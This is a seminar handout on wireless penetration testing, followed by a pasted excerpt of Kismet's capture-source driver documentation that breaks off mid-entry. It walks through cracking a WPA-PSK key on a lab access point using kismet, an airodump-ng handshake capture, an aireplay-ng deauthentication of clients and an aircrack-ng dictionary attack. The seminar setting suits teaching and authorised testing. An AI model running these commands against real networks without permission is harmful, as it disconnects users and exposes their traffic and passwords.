Wireless Penetration Testing: Cracking
WPA-PSK
Security Seminar by:
Edward Brian Drumheller Jr.
Joseph
Allan Krug Esquire
Justin Thomas Lewis
Preparation
For this Seminar we are using a bootable Linux Cd-rom Distribution, BackTrack 3 Beta - 14-12-2007. This is a fully operational operating system that boots from a cd. In order to go forth with this Seminar you will need a CD-R drive and a CD-R or CD-rw disc in which to burn the image file to. You can go to http://www.remote-exploit.org/backtrack_download.html to find the image file from various different mirror websites. Once you obtain the image (the file is 700mb so it can take a while to download), burn it to a cd. If you do not have any programs that allow you to do this, download a program like this one http://cdburnerxp.se/
Once finished, shut your computer down, and restart. You may need to go into your BIOS in order to change the default boot order so that a CD-rom will boot before your hard drive. Pay attention when your system first boots up, there should be a selection for the BIOS often called "setup". Inside find where you can switch the boot order, commonly under "boot". Save settings and exit.
Your system should now restart.
If prompted, press any key to boot to the live disc.
when asked, booted in the KDE option.
Once the desktop loads follow these directions...
Open up a Terminal Windows and run command
“wget http://eddrumheller.com/pen/word.lst”
This file will be downloaded to your home directory and used later
Cracking WPA-PSK
1.
Open up a Terminal Windows and run command
“iwconfig”
2.
Write down the interface that has wireless
extensions
3.
Make sure the mode of the card is set to
Monitor
a.
If mode is set to Managed, run the command “iwconfig wirelessAdapter mode monitor”
4.
Open the conf file by running the command vi /usr/local/etc/kismet.conf 
Change line 27 "# source=none,none,addme" to "sources=<kismetDriver>,<wirelessAdapter>,<wireless>"
Run kismet by running the command "kismet"
in the Terminal. Code will be produced, and a GUI interface will display inside
of the menu.
a.
Press h to view the
help menu
b.
Press x to close any
pop-up menu
c.
Press s
to bring up sort menu
d.
Press b to sort by
BSSID
e.
Highlight Name “dd-wrt”
f.
Press Enter
to view information
g.
Write down BSSID and Channel Number.
h.
Close the kismet terminal window (Mandatory)
5.
Open up a new terminal and type the command
“airodump-ng -c <channel of AP>
--bssid <AP's bssid> -w capture eth0
a.
Leave this window
open, this program will be intercepting the
handshake.
6.
“Open up another terminal and type “aireplay-ng
-0 5 -a <AP's bssid> -c <client's bssid> eth0 to issue a
de-auth packet to the client’s machine who is already authenticated
7.
View the Aireplay and Airodump terminals
side by side. If the injection worked, WPA
Handshake <BSSID> will be displayed in the upper right hand corner of
Airodump.
a.
The capture of the handshake is now stored in your home
directory
8.
crack the handshake with aircrack using the
command
aircrack-ng -w <location of a dictionary file>
-b <AP's bssid> capture*.cap
Note: the key will be displayed once it is
found.
Directions to connect to an AP secured with WPA in BackTrack2
To
connect to WPA, there is a little bit of work needed:
* The creating of a conf file
* Running the script
Creating the .conf file:
open your favourite editor and add the following code
network={
ssid="youraccesspointname"
psk="youraccesspointspassword"
}
Save this in /root as wpa.conf
Running the script:
First run this command
wpa_supplicant -i eth0 (change to your
adaptor) -c wpa.conf
-i = specifies what interface to use
-c = specifies the location of the .conf
file
This should bring up a message that states
that the connection has been successful.
It is important not to close this shell
then open another shell and type
dhcpcd eth0 (change to your adaptor)
Test the connection. 
KISMET Documentation
12.
Capture Sources
A capture source in Kismet is anything
which provides packets to the Kismet
engine. Capture sources define the underlying engine
needed to capture
data from the
interface, how to change channel, and how to enter rfmon
mode. It is necessary to tell Kismet what specific
type of card you use
because different
drivers often use different methods to report information
and enter monitor
mode.
Source type Cards OS Driver
--------------- -------------------
----------- -------------------------
acx100 TI ACX100 Linux ACX100
http://acx100.sourceforge.net/
ACX100 drivers handle the
22mbit cards branded by D-Link
and
others.
admtek ADMTek Linux ADMTek
http://www.latinsud.com/adm8211/
(Patches)
http://aluminum.sourmilk.net/adm8211/
(GPL driver)
ADMTek drivers used in many
consumer 802.11b cards. With
the
patches above, quasi-rfmon is possible - these cards
appear
to be almost entirely software controlled and
always
in a rfmon-like state. This card WILL
BROADCAST
while
in rfmon, rendering the sniffer visible.
The fully GPL drivers are
supported, in addition to the
hacks
to the non-free drivers.
airpcap Airpcap USB cygwin CACE Tech
http://www.cacetech.com/products/airpcap.htm
The CACE AirPcap USB device
allows native capture on
Win32/Cygwin.
The explicit airpcap source
expects the Win32/Cygwin
interface
name. This should be used once the
source
is
identified via airpcap_ask or if multiple simultaneous
sources
are required.
airpcap_ask Airpcap USB cygwin CACE Tech
http://www.cacetech.com/products/airpcap.htm
The CACE AirPcap USB device
allows native capture on
Win32/Cygwin.
The airpcap_ask source
lists available airpcap devices
and
allows the user to pick interactively.
The 'capture interface' field
is irrelevant and can be
filled
with any value (for example, 'dummy')
atmel_usb Atmel-USB Linux Berlios-Atmel
http://at76c503a.berlios.de/
These drivers work ONLY on
USB cards (Sorry, no PCMCIA
support). Monitor mode support is limited and
"faked"
by
bypassing part of the firmware and parsing packets
directly,
and is likely to not report all of the
frames.
This card MAY BROADCAST
while in rfmon, rendering the
sniffer
visible.
It appears that this card
may be only formatting the
beacons
as an 802.11 stream, which means you likely
will
not see data frames, rendering most IDS functions,
IP discovery,
and data logging unavailable.
ath5k Atheros Linux Kernel/Madwifi
http://madwifi.org
Based on the OpenBSD
OpenHAL, the Ath5k drivers are the
future
of Atheros support and will be mainlined into the
Linux
kernel.
ath5k_a
Atheros Linux Kernel/Madwifi
http://madwifi.org
Ath5k source for 11a only
ath5k_ag Atheros Linux Kernel/Madwifi
http://madwifi.org
Ath5k source for 11a/11g
bcm43xx Broadcom Linux BCM43XX
http://bcm43xx.berlios.de,
kernel
Linux native broadcom
drivers incorporated into modern
kernels.
b43 Broadcom Linux
B43 broadcom drivers for
current Broadcom devices in
Linux kernels
b43legacy Broadcom Linux
B43 broadcom drivers for
legacy Broadcom devices in
Linux kernels
cisco Aironet 340,350 Linux
Kernel 2.4.10 - 2.4.19
Standard Cisco cards in
Linux. Works only with
the
Linux kernel drivers, not the drivers found in
pcmcia-cs.
The drivers found on the
cisco.com site can be patched
with
the files from the Kismet download site to add
monitor
mode with channel control, HOWEVER these drivers
are
extremely buggy for normal use and work only with
the
2.4 kernel tree.
The cisco drivers currently
do not enter rfmon mode
correctly,
so channel control is not available. The
firmware
will hop to whatever channel it feels like
hopping
to, when it feels like hopping.
cisco_wifix Aironet 340,350 Linux
Kernel 2.4.20+, CVS
http://sourceforge.net/projects/airo-linux/
Capture interface: 'ethX:wifiX'
Kernel 2.4.20+ and CVS
drivers use ethX for normal mode
and
wifiX for monitor mode. Kismet needs to
know both
devices,
which may not necessarily be the same number,
for
example 'eth1:wifi0'.
Linux kernel 2.4.20 and
2.4.21 have highly unstable cisco
drivers
and should be avoided.
The cisco drivers currently
do not enter rfmon mode
correctly,
so channel control is not available. The
firmware
will hop to whatever channel it feels like
hopping
to, when it feels like hopping.
darwin OSX native cards OSX/Darwin
OSX
Supports
both Broadcom and Atheros Airport-Extreme cards.
When using a Broadcom based
card, it may be necessary to
enable rfmon on
the device for the first time using another
program.
When using an Atheros based
card, 802.11a may also be supported
by
adding a 'sourcechannels' line to kismet.conf.
hostap Prism/2 Linux HostAP 0.4
http://hostap.epitest.fi/
HostAP drivers drive the
Prism/2 chipset in access point
mode,
but also can drive the cards in client and monitor
modes. The HostAP drivers seem to change how they go
into
monitor mode fairly often, but this source should
manage
to get them going.
ipw2100 Intel/Centrino Linux ipw2100-0.44+
http://ipw2100.sourceforge.net/
The Linux IPW2100/Centrino
drivers for 802.11b cards
now
support rfmon, so here's support for them.
They act
more
or less like any other wireless interface would.
ipw2200 Intel/Centrino Linux ipw2200-1.0.4+
http://ipw2200.sourceforge.net/
The Linux IPW2200/Centrino
drivers for 802.11bg cards
support
rfmon as of 1.0.4 and firmware 2.3.
Signal level reporting
requires radiotap be turned on
in
the makefile while compiling the driver.
Noise levels
are
not reported.
ipw2915 Intel/Centrino Linux ipw2200-1.0.4+
http://ipw2200.sourceforge.net/
The Linux IPW2200/Centrino
drivers for 802.11bga cards
support
rfmon as of 1.0.4 and firmware 2.3.
This is the same as ipw2200
but defaults to scanning the
802.11a channel range in
addition to 802.11b/g.
Signal level reporting
requires radiotap be turned on
in
the makefile while compiling the driver.
Noise levels
are
not reported.
ipw3945 Intel/Centrino Linux ipw3945
http://ipw3945.sourceforge.net/
The Linux IPW3945/Centrino
drivers for Intel Core
802.11bga cards.
ipwlivetap Intel/Centrino Linux ipw2200/3945
http://ipw2200.sourceforge.net/
http://ipw3945.sourceforge.net/
The ipw3945 and patched
ipw2200 drivers support a
special
mode which allows monitor-mode style sniffing
while
remaining associated. Channel hopping is
not
possible,
as the card is still associated to a